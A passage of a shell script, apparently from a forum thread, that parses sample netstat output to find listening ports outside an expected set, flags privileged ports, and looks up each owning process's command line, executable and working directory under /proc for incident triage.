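tcp        0      0 192.0.2.5:80            203.0.113.9:51522       ESTABLISHED 1044/httpd
udp        0      0 0.0.0.0:53              0.0.0.0:*                           790/named
EOF
}

# Print "PORT PID PROGRAM" for each listening tcp socket and each udp socket
# in netstat -pantu output read from stdin. udp lines have no State column,
# so the PID/Program field is $6 there and $7 for tcp.
list_listeners() {
    awk '
    $1 !~ /^(tcp|tcp6|udp|udp6)$/ { next }
    $1 ~ /^tcp/ && $6 != "LISTEN" { next }
    {
        n = split($4, a, ":"); port = a[n]
        pp = ($1 ~ /^tcp/) ? $7 : $6
        split(pp, b, "/")
        print port, b[1], b[2]
    }'
}

# Keep only listeners on ports outside EXPECTED_PORTS and add a column saying
# whether the port is privileged (< 1024). As post #7 notes, a non-root user
# cannot bind a port below 1024, so an attacker-opened listener there means root.
unexpected_listeners() {
    list_listeners | while read -r port pid prog; do
        case " $EXPECTED_PORTS " in
            *" $port "*) continue ;;
        esac
        if [ "$port" -lt 1024 ]; then flag=privileged; else flag=unprivileged; fi
        echo "$port $pid $prog $flag"
    done
}

# The lookup post #7 suggests: read /proc/PID/cmdline and resolve the exe and
# cwd links. Fields read "(unavailable)" when the process is gone, the PID is
# "-" or the caller is not root.
proc_lookup() {
    pid=$1
    cmdline=$(tr '\0' ' ' 2>/dev/null < "/proc/$pid/cmdline") || cmdline="(unavailable)"
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null) || exe="(unavailable)"
    cwd=$(readlink "/proc/$pid/cwd" 2>/dev/null) || cwd="(unavailable)"
    printf 'pid=%s cmdline=%s exe=%s cwd=%s\n' "$pid" "$cmdline" "$exe" "$cwd"
}

# Stand-alone run over the constructed sample. On the real box, replace
# sample_netstat with: netstat -pantu | unexpected_listeners
triage() {
    sample_netstat | unexpected_listeners | while read -r port pid prog flag; do
        printf 'port %s (%s) %s/%s: ' "$port" "$flag" "$pid" "$prog"
        proc_lookup "$pid"
    done
}
triage
```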